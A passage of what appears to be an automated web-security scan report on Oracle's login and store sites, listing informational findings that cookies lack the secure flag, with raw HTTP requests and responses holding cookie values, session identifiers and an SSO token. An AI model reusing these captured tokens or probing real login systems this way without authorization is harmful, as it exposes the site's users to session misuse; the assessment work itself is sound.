Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfJ_6MQK6EVaAUS1EaweP001nvY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a.............!.......,...........D..Y.;

4.21. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1728
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfGZ6MQK6EVaAUS1EaweP001nvK
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89ar..........22................BB.......................................................................................................__..........................................................
...[SNIP]...

4.22. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/loginStyling_external.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/loginStyling_external.css?v=1.0 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:40 GMT
Accept-Ranges: bytes
Content-Length: 14395
Content-Type: text/css
Last-Modified: Wed, 24 Aug 2011 03:52:57 GMT
X-ORACLE-DMS-ECID: 0000JCHgeSK6MQK6EVaAUS1EaweP001nt7
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/

/* Desktop Version */
body{font-family:Arial, Helvetica, sans-serif;}
.Mwrapper{ display:none;}
.wrapper{ display:block;margin:0px auto;width:974px; }
.logo-header{float:left; width:974px; height:50px
...[SNIP]...

4.23. https://login.oracle.com/mysso/sso_loginui/moc_lib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:39 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge7K6MQK6EVaAUS1EaweP001nsd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

4.24. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1711
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfGy6MQK6EVaAUS1EaweP001nvM
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

4.25. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 2059
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge^I6MQK6EVaAUS1EaweP001ntL
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

4.26. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 304
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_U6MQK6EVaAUS1EaweP001ntP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.................................................................ST................XY............................TV............................PQ.................................................
...[SNIP]...

4.27. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 154
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_v6MQK6EVaAUS1EaweP001ntS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;

4.28. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 319
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_m6MQK6EVaAUS1EaweP001ntR
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a............................................MO.......MN.......PQ.......ST.........................................................................................................................
...[SNIP]...

4.29. https://login.oracle.com/mysso/sso_loginui/sso_check.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:39 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge7K6MQK6EVaAUS1EaweP001nsc
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

4.30. https://login.oracle.com/mysso/sso_loginui/t-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfHH6MQK6EVaAUS1EaweP001nvP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

4.31. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1005
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfH^6MQK6EVaAUS1EaweP001nvR
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

4.32. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1021
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfH^6MQK6EVaAUS1EaweP001nvS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

4.33. https://login.oracle.com/oam/server/sso/auth_cred_submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2579
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

v=v1.4&request_id=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:14 GMT
X-ORACLE-DMS-ECID: 0000JCHhU_b6MQK6EVaAUS1EaweP001pGi
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/
Content-Length: 2584

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

4.34. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:38 GMT
X-ORACLE-DMS-ECID: 0000JCHgdlx6MQK6EVaAUS1EaweP001nsI
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Content-Length: 3313

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

4.35. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCAcpSSOLogin.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=US
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=e777ccf7edc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secure
Set-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/
